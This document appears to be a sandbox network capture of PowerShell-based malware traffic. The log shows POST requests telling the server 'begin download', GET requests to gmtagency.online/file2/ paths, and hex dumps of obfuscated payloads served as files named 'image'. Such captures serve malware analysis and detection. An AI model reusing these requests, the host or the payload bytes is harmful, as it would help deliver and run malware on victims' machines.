2024-11-15 00:00:50 UTC	297	IN	Data Raw: 25 71 65 75 79 74 67 68 73 69 78 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 33 69 72 56 57 65 52 63 46 4f 74 55 56 65 50 54 31 4b 43 5b 55 4c 76 4f 31 53 53 63 33 65 4b 50 31 47 6f 52 6a 65 31 63 46 57 55 50 55 6d 4b 50 31 71 44 58 6b 48 30 4c 47 71 59 4f 55 43 4c 57 6d 48 30 58 31 65 57 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 52 4c 6d 6d 59 64 45 47 60 54 31 44 34 52 54 4f 4a 60 46 4f 48 50 6f 4f 69 57 31 34 6e 5b 44 65 72 65 6c 4b 71 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 Data Ascii: %qeuytghsix<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#SGGw[1mEPVeJS3irVWeRcFOtUVePT1KC[ULvO1SSc3eKP1GoRje1cFWUPUmKP1qDXkH0LGqYOUCLWmH0X1eW`T82LDuKP1GoRTORLmmYdEG`T1D4RTOJ`FOHPoOiW14n[DerelKqNYGkLkm0RVq{UjOoLDuKP1GoRTORc0q
2024-11-15 00:00:50 UTC	1369	IN	Data Raw: 54 4f 43 5b 31 6d 45 54 6b 47 6b 63 56 75 6f 54 47 4f 43 60 56 47 48 54 6b 43 6b 52 44 31 33 55 49 6a 34 63 6c 4b 58 54 6c 69 60 4c 6d 5b 30 56 55 4f 73 65 56 48 78 4f 59 4f 69 57 7b 57 72 55 49 71 4a 60 54 34 44 50 55 4f 51 53 31 34 70 55 6c 71 4b 4c 6d 6a 78 56 55 57 60 60 6a 5b 70 56 57 53 6f 4c 44 38 49 56 6c 69 5b 60 6c 75 37 56 56 71 47 64 6a 30 37 60 46 69 4e 60 6a 44 7b 55 54 65 53 4c 31 38 54 58 7b 4f 5b 57 47 71 72 55 54 53 6f 4f 44 30 59 53 6c 6d 4e 53 31 6d 35 55 57 53 4b 4f 44 31 78 52 59 69 4f 63 57 54 79 56 56 71 6f 64 6a 34 37 58 32 65 60 57 44 71 71 55 59 71 47 4f 44 30 44 60 7b 47 5b 57 30 6a 76 55 6d 65 57 4c 54 38 49 52 59 6d 4e 53 30 4b 71 55 6a 53 43 4c 30 71 75 56 59 6d 60 60 54 6a 32 53 47 47 77 5b 31 6d 45 50 56 65 6a 52 44 6e 30 Data Ascii: TOC[1mETkGkcVuoTGOC`VGHTkCkRD13UIj4clKXTli`Lm[0VUOseVHxOYOiW{WrUIqJ`T4DPUOQS14pUlqKLmjxVUW``j[pVWSoLD8IVli[`lu7VVqGdj07`FiN`jD{UTeSL18TX{O[WGqrUTSoOD0YSlmNS1m5UWSKOD1xRYiOcWTyVVqodj47X2e`WDqqUYqGOD0D`{G[W0jvUmeWLT8IRYmNS0KqUjSCL0quVYm``Tj2SGGw[1mEPVejRDn0
2024-11-15 00:00:50 UTC	1206	IN	Data Raw: 65 44 54 56 38 4a 50 30 5b 4e 4c 47 6d 58 52 6b 43 4c 57 6a 34 7b 56 6d 65 56 65 31 6d 45 4c 59 71 4b 53 44 54 79 55 32 62 76 52 31 4f 58 4c 44 34 45 63 6b 43 4e 50 33 62 76 52 31 53 53 63 7b 31 3c 23 28 28 3a 0b 25 6d 6e 73 78 72 6a 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 52 6a 69 56 64 56 47 55 50 55 6d 4b 50 31 71 77 5b 44 69 52 65 33 4f 37 63 32 5b 4c 4c 6c 53 31 5b 44 65 46 63 6d 71 59 4f 56 71 6d 54 7b 57 33 58 6c 30 35 62 46 4b 75 57 59 5b 60 63 56 79 7b 56 6d 53 4b 65 6a 38 44 5b 46 30 60 53 31 5b 75 55 54 53 4b 4f 44 30 49 53 6c 75 60 60 6a 34 75 56 56 30 4f Data Ascii: eDTV8JP0[NLGmXRkCLWj4{VmeVe1mELYqKSDTyU2bvR1OXLD4EckCNP3bvR1SSc{1<#((:%mnsxrj<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#RjiVdVGUPUmKP1qw[DiRe3O7c2[LLlS1[DeFcmqYOVqmT{W3Xl05bFKuWY[`cVy{VmSKej8D[F0`S1[uUTSKOD0ISlu``j4uVV0O

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:51 UTC	287	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b83770e2b318095af45e58b24db407ff2f HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 305
2024-11-15 00:00:51 UTC	305	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 67 6d 74 61 67 65 6e 63 79 2e 6f 6e 6c 69 6e 65 2f 66 69 6c 65 32 2f 38 37 66 64 61 66 30 32 38 30 61 64 66 33 66 62 63 34 38 62 30 66 66 34 32 33 35 30 61 66 32 66 62 64 34 65 63 37 62 62 32 66 31 66 37 36 30 32 36 30 31 35 36 38 34 31 38 66 37 35 37 36 33 39 35 66 34 36 37 36 37 32 62 37 33 33 38 38 37 66 64 34 36 66 32 64 64 65 34 63 38 33 66 30 30 30 35 63 63 37 35 37 30 35 32 31 38 34 64 33 66 32 31 34 66 34 36 63 30 62 30 66 30 63 66 35 39 39 38 63 37 64 35 35 61 38 31 38 66 65 31 65 39 33 66 61 33 36 66 33 62 66 66 31 64 39 39 30 64 38 36 33 63 64 30 61 34 31 32 64 39 31 31 36 30 62 37 36 38 33 34 37 62 33 39 36 39 38 30 35 36 31 32 65 35 64 63 38 62 Data Ascii: [ "\"begin download https://gmtagency.online/file2/87fdaf0280adf3fbc48b0ff42350af2fbd4ec7bb2f1f7602601568418f7576395f467672b733887fd46f2dde4c83f0005cc757052184d3f214f46c0b0f0cf5998c7d55a818fe1e93fa36f3bff1d990d863cd0a412d91160b768347b3969805612e5dc8b
2024-11-15 00:00:52 UTC	951	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:52 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mDM%2FnzGB7zL%2F1FeXdheYhZCYoTKgzUz4XTFv7kiGEkqkvEsxvnHFMXJEVqX70x1RO4G9yy%2F%2BmR0DDJRN4JD3VzQn8m8ZZeV5d04RtEbrDtJm%2B6IaUCOTYCehf7TlYCIYSg4WPaPsr58N"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=16790&sent=41493&recv=21665&lost=0&retrans=35&sent_bytes=57349287&recv_bytes=1389051&delivery_rate=49991580&cwnd=224&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6a4286de65f-DEN server-timing: cfL4;desc="?proto=TCP&rtt=22757&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1252&delivery_rate=127414&cwnd=32&unsent_bytes=0&cid=baca19ec864fe44b&ts=667&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:53 UTC	367	OUT	GET /file2/87fdaf0280adf3fbc48b0ff42350af2fbd4ec7bb2f1f7602601568418f7576395f467672b733887fd46f2dde4c83f0005cc757052184d3f214f46c0b0f0cf5998c7d55a818fe1e93fa36f3bff1d990d863cd0a412d91160b768347b3969805612e5dc8bc7a45d72cd6061123b65c9398 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online
2024-11-15 00:00:53 UTC	1068	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:53 GMT Content-Type: application/octet-stream Content-Length: 2868 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cShlvt%2BSixP0Lp%2Bq%2FMcudX1URPC7Q%2FLr6jva9eQ%2FpWSIEYz2rpgi4CzvrsG08fNWJ0PSrbK83g1w3YjzuEilPY2QZAfO6uj9WkbZgHHslxqojwga%2FBbAqlGrjBgqApYWyGA8QniAzMz%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=15314&sent=16170&recv=8619&lost=0&retrans=0&sent_bytes=22153985&recv_bytes=770456&delivery_rate=48105922&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6acbecae65f-DEN server-timing: cfL4;desc="?proto=TCP&rtt=22767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1005&delivery_rate=127251&cwnd=32&unsent_bytes=0&cid=8cb1ff7cb3673b55&ts=668&x=0"
2024-11-15 00:00:53 UTC	301	IN	Data Raw: 25 67 78 75 70 6f 6e 75 73 7b 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 54 6f 43 68 4c 6b 53 6f 57 55 4b 56 65 57 71 45 50 6b 65 44 54 56 38 6f 52 54 4f 43 5b 33 4f 49 53 6f 6d 5b 57 7b 43 77 52 54 5b 31 54 57 54 76 4e 56 6d 69 63 57 5b 70 5b 44 58 76 5b 31 71 49 64 49 5b 60 4c 45 47 37 56 6f 6d 43 62 44 53 53 63 31 34 45 60 54 47 6f 52 54 4f 43 60 6a 6d 47 55 6f 5b 68 63 6d 71 72 58 33 34 53 5b 30 6d 75 4e 56 75 6d 54 31 48 76 58 6f 6d 42 64 6c 53 48 52 6f 43 68 63 56 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 75 6b 4c 30 4b 34 58 57 62 30 63 6d 47 75 4e 56 75 6d 54 31 44 34 Data Ascii: %gxuponus{<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#ToChLkSoWUKVeWqEPkeDTV8oRTOC[3OISom[W{CwRT[1TWTvNVmicW[p[DXv[1qIdI[`LEG7VomCbDSSc14E`TGoRTOC`jmGUo[hcmqrX34S[0muNVumT1HvXomBdlSHRoChcVONP3mC[1mEPVukL0K4XWb0cmGuNVumT1D4
2024-11-15 00:00:53 UTC	1369	IN	Data Raw: 6e 76 57 6a 62 35 65 47 4f 74 55 6f 5b 68 60 56 72 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 69 33 56 6b 40 79 63 46 4c 7b 55 6c 69 60 4c 6d 5b 37 52 54 50 76 5b 30 47 45 5b 32 43 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6f 4f 68 4c 6c 53 4e 56 6d 69 4e 64 6d 6d 59 5b 46 79 6b 64 54 47 78 54 47 4f 43 60 33 4c 7b 54 6f 6d 69 57 7b 57 74 54 56 31 34 60 33 57 54 62 31 34 45 60 54 47 6f 52 54 4f 43 60 33 4b 49 4e 56 34 54 57 30 5b 37 58 7b 4b 46 63 6d 71 58 55 56 65 4d 64 6b 43 6f 52 56 6a 76 65 44 79 55 4c 49 53 4c 54 7b 43 31 55 47 4c 76 60 54 38 32 4c 44 75 44 54 56 38 6f 52 54 4f 43 5b 31 71 49 60 46 79 5b 57 30 4b 72 58 33 34 4f 5b 30 43 55 50 6a 47 6d 4c 7b 40 32 53 47 47 77 5b 31 6d 45 50 56 65 4a 53 32 53 72 5b 57 4f 43 4e 54 6d 45 52 6a 53 68 4c Data Ascii: nvWjb5eGOtUo[h`Vr2SGGw[1mEPVeJS2i3Vk@ycFL{Uli`Lm[7RTPv[0GE[2CQe{CMRTOC[1mEToOhLlSNVmiNdmmY[FykdTGxTGOC`3L{TomiW{WtTV14`3WTb14E`TGoRTOC`3KINV4TW0[7X{KFcmqXUVeMdkCoRVjveDyULISLT{C1UGLv`T82LDuDTV8oRTOC[1qI`Fy[W0KrX34O[0CUPjGmL{@2SGGw[1mEPVeJS2Sr[WOCNTmERjShL
2024-11-15 00:00:53 UTC	1198	IN	Data Raw: 34 50 56 75 69 54 31 47 31 58 6a 69 53 5b 31 71 49 52 6b 57 6a 53 30 5b 42 58 33 34 4a 60 46 57 55 4f 54 30 60 57 7b 57 74 5b 44 65 6f 4f 31 6d 45 54 6f 43 4d 64 59 4f 76 52 54 69 7b 5b 31 71 49 52 6b 57 6a 53 30 5b 42 58 33 34 4a 60 46 57 56 62 33 75 69 57 6b 43 6f 54 47 4f 43 60 30 6d 74 63 45 43 60 57 54 5b 34 58 33 30 46 4f 57 65 34 54 6f 43 58 54 31 47 31 56 56 34 6e 65 6c 4f 71 50 59 69 51 64 54 48 34 53 47 47 77 52 6a 4f 57 63 49 57 6a 63 55 6d 78 56 6d 4c 79 53 6c 57 48 50 6f 6d 60 56 44 34 37 58 57 62 34 65 54 6d 45 60 46 4b 57 4c 33 79 37 5b 44 65 56 65 44 79 72 54 6c 79 6d 52 47 47 30 54 6d 62 30 60 6c 48 78 54 6f 43 68 63 56 53 6a 55 33 71 76 57 6d 5b 47 56 55 53 4c 60 33 53 72 5b 44 5b 4e 4c 46 4f 75 63 49 57 60 64 56 65 73 56 56 34 72 4c 47 Data Ascii: 4PVuiT1G1XjiS[1qIRkWjS0[BX34J`FWUOT0`W{Wt[DeoO1mEToCMdYOvRTi{[1qIRkWjS0[BX34J`FWVb3uiWkCoTGOC`0mtcEC`WT[4X30FOWe4ToCXT1G1VV4nelOqPYiQdTH4SGGwRjOWcIWjcUmxVmLySlWHPom`VD47XWb4eTmE`FKWL3y7[DeVeDyrTlymRGG0Tmb0`lHxToChcVSjU3qvWm[GVUSL`3Sr[D[NLFOucIW`dVesVV4rLG

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:54 UTC	287	OUT	POST /2b4078cc626cf9f1ca848fab93b1338a6070d7977a6e0881ab4b11283b12e5b81af370a0fc53a2749dd204bd2d59a650 HTTP/1.1 Content-Type: application/json User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online Content-Length: 305
2024-11-15 00:00:54 UTC	305	OUT	Data Raw: 5b 0d 0a 20 20 20 20 22 5c 22 62 65 67 69 6e 20 64 6f 77 6e 6c 6f 61 64 20 68 74 74 70 73 3a 2f 2f 67 6d 74 61 67 65 6e 63 79 2e 6f 6e 6c 69 6e 65 2f 66 69 6c 65 32 2f 36 30 65 66 37 36 65 39 64 62 37 31 31 36 36 39 33 33 36 34 64 36 64 36 64 35 63 34 36 65 63 61 34 36 64 64 33 39 34 30 62 62 64 66 35 39 30 30 37 63 35 32 64 61 31 35 61 38 35 63 31 36 33 37 63 33 64 36 38 65 64 39 62 35 32 38 31 38 37 63 35 64 62 34 37 31 38 35 39 37 66 30 32 64 32 31 30 37 32 63 32 63 30 33 34 65 32 37 30 36 30 36 36 66 33 31 61 34 63 31 65 35 33 39 30 38 37 39 63 36 39 36 65 61 64 66 30 31 38 31 31 62 32 36 62 62 37 64 66 65 30 36 36 37 37 66 39 37 64 62 63 65 66 32 30 62 65 34 62 35 34 62 30 63 63 62 31 33 38 66 33 61 63 62 62 38 31 31 35 32 31 39 37 65 39 35 35 63 63 Data Ascii: [ "\"begin download https://gmtagency.online/file2/60ef76e9db7116693364d6d6d5c46eca46dd3940bbdf59007c52da15a85c1637c3d68ed9b528187c5db4718597f02d21072c2c034e2706066f31a4c1e5390879c696eadf01811b26bb7dfe06677f97dbcef20be4b54b0ccb138f3acbb81152197e955cc
2024-11-15 00:00:55 UTC	951	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:55 GMT Content-Length: 0 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LBhzfQdjo2B3XEmGQ5j%2BGQz4cwhOww1vI7y84EV0PdeMLzbapqu9mhHV0LJynbFxjpFvP40mdURYiIiAiB%2BD5C21JFe%2Fs7YoIslDVIU8CzNy42xxBvxAeVlfx7yqTJH%2F6j%2FVNezgmQkq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=24764&sent=60454&recv=30314&lost=0&retrans=0&sent_bytes=84538502&recv_bytes=1455687&delivery_rate=40500340&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6b50bb16c2b-DFW server-timing: cfL4;desc="?proto=TCP&rtt=1903&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2839&recv_bytes=1252&delivery_rate=1502854&cwnd=227&unsent_bytes=0&cid=b820b54f438ba761&ts=662&x=0"

Timestamp	Bytes transferred	Direction	Data
2024-11-15 00:00:55 UTC	367	OUT	GET /file2/60ef76e9db7116693364d6d6d5c46eca46dd3940bbdf59007c52da15a85c1637c3d68ed9b528187c5db4718597f02d21072c2c034e2706066f31a4c1e5390879c696eadf01811b26bb7dfe06677f97dbcef20be4b54b0ccb138f3acbb81152197e955cc0e87105f7ac4bc6be65825098 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: gmtagency.online
2024-11-15 00:00:56 UTC	1063	IN	HTTP/1.1 200 OK Date: Fri, 15 Nov 2024 00:00:56 GMT Content-Type: application/octet-stream Content-Length: 21762 Connection: close content-disposition: attachment; filename=image; filename*=UTF-8''image cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=111qExH%2Bgy4sQU%2BO%2BwakHO6rPohC78CDL%2BJ4EAE6i4wS4p1CCGwoSzNJ99adeyUhndqDjYkAzZlnyu6NfqFPtIAi29VrmqWmS6Vvj6j4Fm5uCV6JcKPGM9SqYOFVLs0KQrR0hQfHJn0V"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=10693&sent=16179&recv=8628&lost=0&retrans=0&sent_bytes=22158626&recv_bytes=775846&delivery_rate=48105922&cwnd=228&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" X-Powered-By: ARR/3.0 Server: cloudflare CF-RAY: 8e2af6bd68f11f4e-DEN server-timing: cfL4;desc="?proto=TCP&rtt=22603&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2840&recv_bytes=1005&delivery_rate=128079&cwnd=32&unsent_bytes=0&cid=1b57f68ebb85cb55&ts=467&x=0"
2024-11-15 00:00:56 UTC	306	IN	Data Raw: 25 67 6d 69 63 66 6e 6a 63 69 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 56 57 65 72 65 54 53 53 63 33 65 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 46 55 6b 43 5b 56 44 6e 76 55 47 5b 4e 62 30 71 59 57 6f 65 4b 50 7b 47 54 56 6d 65 4e 65 6c 4b 75 54 6f 71 4b 53 44 54 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 65 57 71 58 5b 47 57 69 57 7b 47 72 52 54 50 76 5b 30 48 78 57 6b 43 4c 57 57 4b 6e 5b 44 65 57 4f 31 53 53 63 33 65 4b 50 31 47 6f 5b 6d 44 76 52 31 53 53 63 33 65 4b 50 31 47 6f 57 45 43 52 54 47 53 47 4c 57 4b 56 4c 49 43 4d 57 59 6d 43 60 57 4b 75 Data Ascii: %gmicfnjci<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#VWereTSSc3eKP1GoRTOC[1mFUkC[VDnvUG[Nb0qYWoeKP{GTVmeNelKuToqKSDT2SGGw[1mEPVeKP1GoRTOReWqX[GWiW{GrRTPv[0HxWkCLWWKn[DeWO1SSc3eKP1Go[mDvR1SSc3eKP1GoWECRTGSGLWKVLICMWYmC`WKu
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 60 57 7b 6a 79 5b 44 5b 4e 63 47 6a 78 4e 59 57 60 52 44 30 6f 58 7b 4b 56 60 6c 48 78 4f 56 75 6b 64 55 53 71 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 47 70 52 54 5b 4a 63 46 53 48 57 6f 6d 68 60 54 47 73 56 6c 30 46 62 33 4c 78 57 56 65 69 57 7b 57 73 58 57 65 4e 60 46 53 49 63 49 57 60 64 54 48 76 58 54 65 57 5b 30 71 75 63 49 4f 60 54 31 48 7b 56 57 69 4f 5b 33 4b 75 4e 55 43 4b 53 30 71 33 5b 47 62 30 60 31 53 53 63 33 65 4b 50 31 47 6f 58 33 30 56 4c 46 53 58 52 6f 57 4b 50 30 4b 75 56 57 65 35 64 6d 71 53 4c 44 75 6c 54 55 43 4d 53 47 47 77 55 6a 4f 73 4e 54 57 54 4c 49 69 4e 57 57 5b 6a 52 30 4f 72 55 56 65 4b 60 31 34 77 56 6d 65 4e 62 6a 6d 49 4c 55 47 6a 53 30 58 31 5b 44 4f 4b 4f 31 53 53 63 33 75 68 56 47 48 31 56 45 4b 4e 63 33 47 59 64 46 Data Ascii: `W{jy[D[NcGjxNYW`RD0oX{KV`lHxOVukdUSqSGGwUjOqPVeKP1GpRT[JcFSHWomh`TGsVl0Fb3LxWVeiW{WsXWeN`FSIcIW`dTHvXTeW[0qucIO`T1H{VWiO[3KuNUCKS0q3[Gb0`1SSc3eKP1GoX30VLFSXRoWKP0KuVWe5dmqSLDulTUCMSGGwUjOsNTWTLIiNWW[jR0OrUVeK`14wVmeNbjmILUGjS0X1[DOKO1SSc3uhVGH1VEKNc3GYdF
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 52 31 6d 45 50 56 65 4b 52 45 43 4e 50 33 6d 43 5b 31 6d 45 50 6d 43 52 53 55 6d 4f 57 47 5b 46 56 47 4f 73 62 47 53 4b 50 30 4b 76 58 7b 47 56 50 6d 44 76 4e 59 65 60 57 7b 50 32 53 47 47 77 55 6a 4f 71 50 56 65 4b 50 31 4b 76 56 6c 6d 6f 60 33 47 58 55 6d 5b 53 57 54 34 50 58 31 65 56 65 54 6d 45 4c 56 79 6b 54 31 47 32 52 30 44 76 52 31 6d 45 50 56 65 4b 52 49 4f 4e 50 33 6d 43 5b 31 6d 45 50 56 65 4b 50 31 47 6f 57 45 43 52 54 47 53 47 4c 57 4b 56 4c 49 43 4d 57 59 6d 43 60 56 44 78 4e 46 65 5b 4c 6a 5b 30 52 54 65 4a 4f 56 4f 49 53 6f 71 6b 64 54 48 79 56 57 65 4f 60 54 38 32 4c 44 75 4b 50 31 47 6f 52 54 4f 43 5b 31 6d 45 50 6d 53 6a 53 31 5b 34 5b 44 4c 79 54 56 4f 75 4e 56 71 60 56 44 34 37 52 54 4f 4a 60 6c 4b 59 54 59 57 60 56 46 69 72 52 56 6d Data Ascii: R1mEPVeKRECNP3mC[1mEPmCRSUmOWG[FVGOsbGSKP0KvX{GVPmDvNYe`W{P2SGGwUjOqPVeKP1KvVlmo`3GXUm[SWT4PX1eVeTmELVykT1G2R0DvR1mEPVeKRIONP3mC[1mEPVeKP1GoWECRTGSGLWKVLICMWYmC`VDxNFe[Lj[0RTeJOVOISoqkdTHyVWeO`T82LDuKP1GoRTOC[1mEPmSjS1[4[DLyTVOuNVq`VD47RTOJ`lKYTYW`VFirRVm
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 55 47 42 54 57 53 42 50 6d 48 76 63 44 4b 59 63 44 5b 42 55 54 57 46 52 47 65 57 53 6a 38 60 4c 44 57 32 54 57 57 52 50 6d 47 57 4e 54 4b 53 57 44 4b 42 54 6a 65 6a 50 6d 53 58 5b 44 4f 69 60 31 5b 47 57 6d 57 46 55 6d 57 57 53 59 69 53 57 56 53 46 54 57 5b 76 63 6d 47 75 65 44 4b 52 4c 54 5b 42 57 33 30 6a 50 6a 30 47 53 6a 57 53 57 54 5b 69 56 6b 43 46 4f 47 47 57 5b 44 5b 53 57 55 57 74 54 57 69 6a 50 6d 48 76 57 6a 4b 54 4c 44 5b 42 55 55 43 46 53 57 4b 57 53 6d 43 53 57 54 57 35 54 57 57 6a 53 6d 47 56 62 46 34 53 57 47 5b 42 54 6a 5b 56 50 6d 65 58 5b 44 4b 6d 60 31 5b 48 57 57 57 46 55 30 6e 76 52 6f 4f 53 57 57 4b 46 54 57 54 30 50 6d 47 75 63 44 4b 52 53 57 5b 42 57 30 65 6a 50 6a 34 47 53 6a 57 56 57 54 5b 69 56 6b 43 46 4f 47 47 57 5b 47 4b 53 Data Ascii: UGBTWSBPmHvcDKYcD[BUTWFRGeWSj8`LDW2TWWRPmGWNTKSWDKBTjejPmSX[DOi`1[GWmWFUmWWSYiSWVSFTW[vcmGueDKRLT[BW30jPj0GSjWSWT[iVkCFOGGW[D[SWUWtTWijPmHvWjKTLD[BUUCFSWKWSmCSWTW5TWWjSmGVbF4SWG[BTj[VPmeX[DKm`1[HWWWFU0nvRoOSWWKFTWT0PmGucDKRSW[BW0ejPj4GSjWVWT[iVkCFOGGW[GKS
2024-11-15 00:00:56 UTC	516	IN	Data Raw: 47 75 4f 54 4b 52 4c 57 5b 42 56 55 4f 6a 50 6d 6e 76 53 6a 53 6b 4c 44 5b 53 57 57 57 46 63 6d 47 57 55 6d 4b 53 57 31 35 7b 54 56 71 42 50 6d 4f 47 63 44 4b 5b 57 6a 5b 45 5b 47 57 46 52 47 6a 76 53 6d 4b 60 4c 44 6e 78 54 57 57 6a 54 6d 47 59 57 6d 4b 53 57 46 53 42 54 57 53 42 50 6d 44 78 5b 44 4b 60 4c 44 5b 44 54 57 57 46 52 6d 47 57 53 6c 34 53 57 54 34 52 54 57 65 4a 50 6d 47 74 56 6a 4b 52 4c 6a 34 42 57 6a 5b 46 50 33 4b 47 53 6a 6d 54 57 54 5b 70 5b 45 43 4a 63 30 47 57 5b 46 71 53 57 6f 43 52 54 56 34 76 50 6d 44 76 53 6a 4b 55 4c 33 53 42 55 30 57 46 53 47 47 57 53 6a 71 60 4c 44 58 76 54 57 57 4f 65 30 47 57 64 47 4b 53 56 47 4b 42 54 59 71 42 50 6d 53 46 53 6a 4b 6a 53 54 5b 44 55 54 57 46 55 57 57 57 53 6b 43 53 57 54 34 4a 54 57 54 34 4c Data Ascii: GuOTKRLW[BVUOjPmnvSjSkLD[SWWWFcmGWUmKSW15{TVqBPmOGcDK[Wj[E[GWFRGjvSmK`LDnxTWWjTmGYWmKSWFSBTWSBPmDx[DK`LD[DTWWFRmGWSl4SWT4RTWeJPmGtVjKRLj4BWj[FP3KGSjmTWT[p[ECJc0GW[FqSWoCRTV4vPmDvSjKUL3SBU0WFSGGWSjq`LDXvTWWOe0GWdGKSVGKBTYqBPmSFSjKjST[DUTWFUWWWSkCSWT4JTWT4L
2024-11-15 00:00:56 UTC	1369	IN	Data Raw: 4b 53 4c 44 5b 42 54 30 57 46 50 6c 44 76 53 6a 6d 59 57 54 5b 60 57 57 57 4a 64 6d 47 57 60 47 5b 53 57 6f 43 52 54 57 65 6a 50 6d 4b 44 50 6a 4b 55 57 54 5b 42 58 57 57 46 52 47 4b 57 53 6c 71 53 57 54 6e 7b 54 57 57 6a 4c 30 47 59 53 6d 4b 53 63 59 43 42 54 6b 43 56 50 6d 71 47 53 6a 4f 6b 53 54 5b 48 55 31 57 46 60 57 6e 76 53 6b 4b 53 57 56 53 33 54 57 65 4e 4c 30 47 74 56 6a 4b 52 64 6d 4b 42 54 30 65 6a 50 6a 35 76 53 6a 4b 4f 53 54 5b 44 56 6b 43 46 55 30 47 57 53 6f 5b 53 57 56 79 42 54 57 65 6a 50 6d 44 76 53 6a 4b 55 57 54 5b 42 58 55 43 46 52 47 6e 76 53 6c 47 57 57 54 71 77 54 57 57 6a 54 